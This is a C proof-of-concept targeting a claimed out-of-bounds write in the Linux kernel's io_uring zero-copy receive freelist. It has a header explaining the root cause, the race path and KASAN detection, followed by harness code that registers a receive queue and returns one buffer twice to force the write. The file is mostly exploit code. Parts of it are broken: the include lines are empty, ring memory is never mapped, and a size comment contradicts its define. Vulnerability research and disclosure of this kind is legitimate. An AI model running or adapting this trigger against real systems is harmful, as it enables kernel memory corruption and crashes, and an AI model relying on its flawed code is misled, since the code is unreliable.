/* * CVE PoC: io_uring ZCRX freelist out-of-bounds write * * Affected: Linux 6.12 - 6.19+ (CONFIG_IO_URING_ZCRX=y) * File: io_uring/zcrx.c: io_zcrx_return_niov_freelist() * Impact: Heap OOB write (4-byte u32) adjacent to io_zcrx_area.freelist[] * * ROOT CAUSE * ---------- * io_zcrx_return_niov_freelist() writes to area->freelist[area->free_count++] * with no bounds check against area->nia.num_niovs. freelist[] is allocated * with exactly num_niovs u32 entries (line 453): * * area->freelist = kvmalloc_array(nr_iovs, sizeof(area->freelist[0]), ...); * * free_count starts at num_niovs (all buffers free). Once free_count reaches * num_niovs, any additional call to io_zcrx_return_niov_freelist() writes * freelist[num_niovs] — past the end of the allocation. * * VULNERABLE CODE (zcrx.c ~line 559) * ------------------------------------ * static void io_zcrx_return_niov_freelist(struct net_iov *niov) { * struct io_zcrx_area *area = io_zcrx_iov_to_area(niov); * spin_lock_bh(&area->freelist_lock); * area->freelist[area->free_count++] = net_iov_idx(niov); // NO CHECK * spin_unlock_bh(&area->freelist_lock); * } * * DOUBLE-RETURN TRIGGER PATH * -------------------------- * io_pp_zc_release_netmem() (page pool release callback) calls: * 1. net_mp_niov_clear_page_pool(niov) → sets niov->desc.pp = NULL * 2. io_zcrx_return_niov_freelist(niov) → PATH A: freelist[free_count++] = idx * * Race: if after step 1 but before step 2 another thread calls * io_zcrx_return_niov(niov), it sees niov->desc.pp == NULL (copy fallback check) * and calls io_zcrx_return_niov_freelist(niov) → PATH B: freelist[free_count++] * * Concurrent PATH A + PATH B on same niov → double increment of free_count → * one write lands at freelist[num_niovs] (OOB). * * ALSO: io_zcrx_scrub() calls io_zcrx_return_niov() which can trigger PATH B * while the page pool's async cleanup triggers PATH A concurrently. * * REQUIREMENTS * ------------ * - Linux 6.12+ with CONFIG_IO_URING_ZCRX=y * - NIC with page_pool zero-copy support (mlx5, nfp, etc.) OR veth+XDP driver * - io_uring enabled (io_uring_disabled = 0, check /proc/sys/kernel/io_uring_disabled) * - Unprivileged user namespaces OR run as root * - Compile: gcc -O2 -o poc_zcrx_freelist_oob poc_zcrx_freelist_oob.c * * DETECTION * --------- * With CONFIG_KASAN=y: * KASAN: slab-out-of-bounds Write in io_zcrx_return_niov_freelist * * NOTE: Without a page-pool-capable NIC, setup will fail at IORING_REGISTER_ZCRX_IFQ. * The PoC documents the trigger path and provides the setup harness. */ #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* io_uring syscall wrappers */ static int io_uring_setup(unsigned entries, struct io_uring_params *p) { return syscall(__NR_io_uring_setup, entries, p); } static int io_uring_register(int fd, unsigned op, void *arg, unsigned nr_args) { return syscall(__NR_io_uring_register, fd, op, arg, nr_args); } static int io_uring_enter(int fd, unsigned to_submit, unsigned min_complete, unsigned flags, sigset_t *sig) { return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig, _NSIG / 8); } /* Minimum area size: 4096 pages * 4096 bytes = 16MB (typical minimum) */ #define AREA_SIZE (256 * 4096) /* 256 pages = 256 niovs */ #define RQ_ENTRIES 64 #define NUM_NIOVS (AREA_SIZE / 4096) /* one niov per page */ struct zcrx_ctx { int ring_fd; int sock_fd; int server_fd; void *sq_ring; void *cq_ring; void *sq_sqes; void *rq_ring; /* refill queue ring */ void *area_buf; /* ZCRX buffer area (mmap'd) */ struct io_uring_zcrx_offsets rq_offsets; uint32_t zcrx_id; uint64_t area_token; /* from area_reg.rq_area_token */ }; static int setup_uring(struct zcrx_ctx *ctx) { struct io_uring_params p = {}; /* ZCRX requires DEFER_TASKRUN + (CQE32 or CQE_MIXED) — checked at line 747-750 in zcrx.c */ p.flags = IORING_SETUP_DEFER_TASKRUN | IORING_SETUP_SINGLE_ISSUER | IORING_SETUP_CQE32; ctx->ring_fd = io_uring_setup(64, &p); if (ctx->ring_fd < 0) { perror("io_uring_setup"); return -1; } printf("[*] io_uring fd=%d, sq_entries=%u cq_entries=%u\n", ctx->ring_fd, p.sq_entries, p.cq_entries); return 0; } /* * Attempt to register a ZCRX IFQ on the given interface name and RX queue. * Returns 0 on success, -1 if the NIC doesn't support page_pool zero-copy. */ static int setup_zcrx(struct zcrx_ctx *ctx, const char *ifname, int rxq) { struct io_uring_zcrx_area_reg area_reg = {}; struct io_uring_zcrx_ifq_reg ifq_reg = {}; struct io_uring_region_desc region = {}; void *rq_ring_mem; int rq_ring_size; int ret; /* Allocate buffer area: userspace memory that kernel will pin */ ctx->area_buf = mmap(NULL, AREA_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_HUGETLB, -1, 0); if (ctx->area_buf == MAP_FAILED) { /* Fallback to regular pages */ ctx->area_buf = mmap(NULL, AREA_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); if (ctx->area_buf == MAP_FAILED) { perror("mmap area_buf"); return -1; } } /* Touch pages to fault them in */ memset(ctx->area_buf, 0, AREA_SIZE); /* * Region descriptor: kernel will map the refill queue here. * Pass user_addr=0 to let kernel choose the address. */ rq_ring_size = RQ_ENTRIES * sizeof(struct io_uring_zcrx_rqe) + sizeof(struct io_uring_zcrx_offsets); region.user_addr = 0; region.size = (rq_ring_size + 4095) & ~4095UL; region.flags = 0; area_reg.addr = (uint64_t)(uintptr_t)ctx->area_buf; area_reg.len = AREA_SIZE; area_reg.flags = 0; ifq_reg.if_idx = if_nametoindex(ifname); if (!ifq_reg.if_idx) { fprintf(stderr, "[-] Interface '%s' not found\n", ifname); return -1; } ifq_reg.if_rxq = rxq; ifq_reg.rq_entries = RQ_ENTRIES; ifq_reg.flags = 0; ifq_reg.area_ptr = (uint64_t)(uintptr_t)&area_reg; ifq_reg.region_ptr = (uint64_t)(uintptr_t)®ion; printf("[*] Registering ZCRX IFQ: if=%s (%u) rxq=%d area=%p len=0x%x\n", ifname, ifq_reg.if_idx, rxq, ctx->area_buf, AREA_SIZE); printf("[*] num_niovs expected: %d\n", NUM_NIOVS); ret = io_uring_register(ctx->ring_fd, IORING_REGISTER_ZCRX_IFQ, &ifq_reg, 1); if (ret < 0) { fprintf(stderr, "[-] IORING_REGISTER_ZCRX_IFQ failed: %s\n", strerror(errno)); fprintf(stderr, " This NIC/driver doesn't support page_pool ZCRX.\n"); fprintf(stderr, " Requires mlx5, nfp, or patched veth driver.\n"); return -1; } ctx->zcrx_id = ifq_reg.zcrx_id; ctx->area_token = area_reg.rq_area_token; ctx->rq_offsets = ifq_reg.offsets; printf("[+] ZCRX IFQ registered: id=%u area_token=0x%016lx\n", ctx->zcrx_id, ctx->area_token); printf("[+] RQ ring: head_off=%u tail_off=%u rqes_off=%u\n", ifq_reg.offsets.head, ifq_reg.offsets.tail, ifq_reg.offsets.rqes); /* * Map the refill queue ring. The kernel populated region.mmap_offset * after registration. */ rq_ring_mem = mmap(NULL, region.size, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, ctx->ring_fd, region.mmap_offset); if (rq_ring_mem == MAP_FAILED) { perror("mmap rq_ring"); return -1; } ctx->rq_ring = rq_ring_mem; printf("[+] RQ ring mapped at %p (size 0x%llx)\n", rq_ring_mem, region.size); return 0; } /* * Return a niov to the kernel by writing its area offset to the RQ ring. * area_token encodes the area_id in bits [63:48]. * niov_idx is the buffer index (0-based), shifted by PAGE_SHIFT. */ static void rq_return_niov(struct zcrx_ctx *ctx, uint32_t niov_idx, uint32_t len) { volatile uint32_t *head = (uint32_t *)((char *)ctx->rq_ring + ctx->rq_offsets.head); volatile uint32_t *tail = (uint32_t *)((char *)ctx->rq_ring + ctx->rq_offsets.tail); struct io_uring_zcrx_rqe *rqes = (struct io_uring_zcrx_rqe *)((char *)ctx->rq_ring + ctx->rq_offsets.rqes); uint32_t t = __atomic_load_n(tail, __ATOMIC_ACQUIRE); uint32_t mask = RQ_ENTRIES - 1; struct io_uring_zcrx_rqe *rqe = &rqes[t & mask]; /* * rqe->off encodes both area_id (bits 63:48) and niov offset (bits 47:0). * niov offset = niov_idx << PAGE_SHIFT (i.e., niov_idx * 4096). */ rqe->off = ctx->area_token | ((uint64_t)niov_idx << 12); rqe->len = len; rqe->__pad = 0; __atomic_store_n(tail, t + 1, __ATOMIC_RELEASE); } /* * TRIGGER: Attempt double-return of niov index 0. * * This demonstrates the race between: * - Page pool async cleanup (io_pp_zc_release_netmem → freelist write) * - Concurrent io_zcrx_return_niov (after pp cleared → freelist write again) * * In normal flow, niov 0 is delivered after packet arrives. * Here we manually craft the conditions after receiving one packet. */ static void trigger_double_return(struct zcrx_ctx *ctx) { printf("[*] Attempting double-return trigger...\n"); printf("[*] Kernel state: freelist[] has num_niovs=%d entries max\n", NUM_NIOVS); printf("[*] free_count starts at %d (all free)\n", NUM_NIOVS); printf("[*] After packet arrives: niov removed from freelist (free_count--)\n"); printf("[*] Step 1: Return niov 0 via RQ (normal path)\n"); /* Normal return: user_refs--, then pp_unref, then freelist if pp==NULL */ rq_return_niov(ctx, 0, 4096); printf("[*] Step 2: Return niov 0 again — triggers io_zcrx_return_niov_freelist\n"); printf("[*] second time with free_count=num_niovs → OOB WRITE\n"); printf("[*] freelist[num_niovs] = 0 ← past end of array!\n"); /* * The race window: between io_pp_zc_release_netmem clearing pp (setting * niov->desc.pp = NULL) and calling io_zcrx_return_niov_freelist(), a * concurrent io_zcrx_return_niov() sees pp==NULL and calls freelist again. * * Write niov 0 a second time to the RQ. If user_refs protection fails * due to the race, or if triggered via the scrub+ring_refill concurrent * path, this causes: * area->freelist[area->free_count++] = 0; * where free_count == num_niovs → OOB write of 4 bytes. */ rq_return_niov(ctx, 0, 4096); /* Force kernel to process the RQ entries */ printf("[*] Triggering ZCRX_CTRL_FLUSH_RQ to process queue...\n"); struct zcrx_ctrl ctrl = { .zcrx_id = ctx->zcrx_id, .op = ZCRX_CTRL_FLUSH_RQ, }; io_uring_register(ctx->ring_fd, IORING_REGISTER_ZCRX_CTRL, &ctrl, 1); } /* * Setup a TCP connection to generate actual ZCRX traffic. * Both server and client on loopback — real NIC needed for page_pool ZC. */ static int setup_tcp_pair(struct zcrx_ctx *ctx, uint16_t port) { struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(port), .sin_addr.s_addr = inet_addr("127.0.0.1"), }; int yes = 1; ctx->server_fd = socket(AF_INET, SOCK_STREAM, 0); setsockopt(ctx->server_fd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)); if (bind(ctx->server_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0 || listen(ctx->server_fd, 1) < 0) { perror("bind/listen"); return -1; } ctx->sock_fd = socket(AF_INET, SOCK_STREAM, 0); if (connect(ctx->sock_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("connect"); return -1; } printf("[+] TCP pair ready on port %u\n", port); return 0; } /* Submit IORING_OP_RECV_ZC for zero-copy receive */ static void submit_zcrx_recv(struct zcrx_ctx *ctx) { struct io_uring_sqe *sqe; /* Access SQ ring directly — simplified, assumes sqe at offset 0 */ /* In real usage: use liburing or proper ring pointer arithmetic */ struct io_uring_sqe sqe_buf = {}; sqe_buf.opcode = IORING_OP_RECV_ZC; sqe_buf.fd = ctx->sock_fd; sqe_buf.len = 0x10000; sqe_buf.zcrx_ifq_idx = ctx->zcrx_id; sqe_buf.user_data = 1; /* Write sqe to ring — simplified */ memcpy(ctx->sq_sqes, &sqe_buf, sizeof(sqe_buf)); io_uring_enter(ctx->ring_fd, 1, 0, 0, NULL); printf("[*] Submitted RECV_ZC on sock_fd=%d\n", ctx->sock_fd); } int main(int argc, char **argv) { struct zcrx_ctx ctx = {}; const char *ifname = (argc > 1) ? argv[1] : "eth0"; int rxq = (argc > 2) ? atoi(argv[2]) : 0; uint16_t port = 9999; printf("[*] io_uring ZCRX freelist OOB PoC\n"); printf("[*] Target: io_zcrx_return_niov_freelist() no bounds check\n"); printf("[*] Interface: %s, RXQ: %d\n", ifname, rxq); if (setup_uring(&ctx) < 0) return 1; if (setup_zcrx(&ctx, ifname, rxq) < 0) { printf("\n[!] ZCRX setup failed. Showing vulnerable code path:\n"); printf("\n io_zcrx_return_niov_freelist(niov) {\n"); printf(" spin_lock_bh(&area->freelist_lock);\n"); printf(" area->freelist[area->free_count++] = net_iov_idx(niov);\n"); printf(" // ^^^^^^^^^^^^^^^^\n"); printf(" // NO CHECK: free_count vs num_niovs\n"); printf(" // OOB write when free_count >= num_niovs\n"); printf(" spin_unlock_bh(&area->freelist_lock);\n"); printf(" }\n\n"); printf("[!] Need NIC with page_pool ZC support. Using:\n"); printf(" mlx5: set rxq=\n"); printf(" nfp: similar setup\n"); printf(" OR: patch veth driver to support io_uring mp_ops\n"); close(ctx.ring_fd); return 1; } printf("\n[+] ZCRX IFQ registered. Area has %d niovs.\n", NUM_NIOVS); printf("[+] freelist[] allocated: %d * 4 = %d bytes\n", NUM_NIOVS, NUM_NIOVS * 4); printf("[+] OOB target: freelist[%d] = *(freelist + 0x%x)\n", NUM_NIOVS, NUM_NIOVS * 4); if (setup_tcp_pair(&ctx, port) < 0) goto cleanup; printf("\n[*] Send data to generate ZCRX packet (triggers niov delivery):\n"); printf(" In another terminal: echo 'A' | nc 127.0.0.1 %u\n\n", port); printf("[*] Waiting 2s for inbound packet...\n"); sleep(2); trigger_double_return(&ctx); printf("\n[+] If KASAN enabled: check dmesg for:\n"); printf(" KASAN: slab-out-of-bounds Write in io_zcrx_return_niov_freelist\n"); printf(" BUG: KASAN: slab-out-of-bounds\n"); cleanup: if (ctx.sock_fd) close(ctx.sock_fd); if (ctx.server_fd) close(ctx.server_fd); close(ctx.ring_fd); if (ctx.area_buf != MAP_FAILED && ctx.area_buf) munmap(ctx.area_buf, AREA_SIZE); return 0; }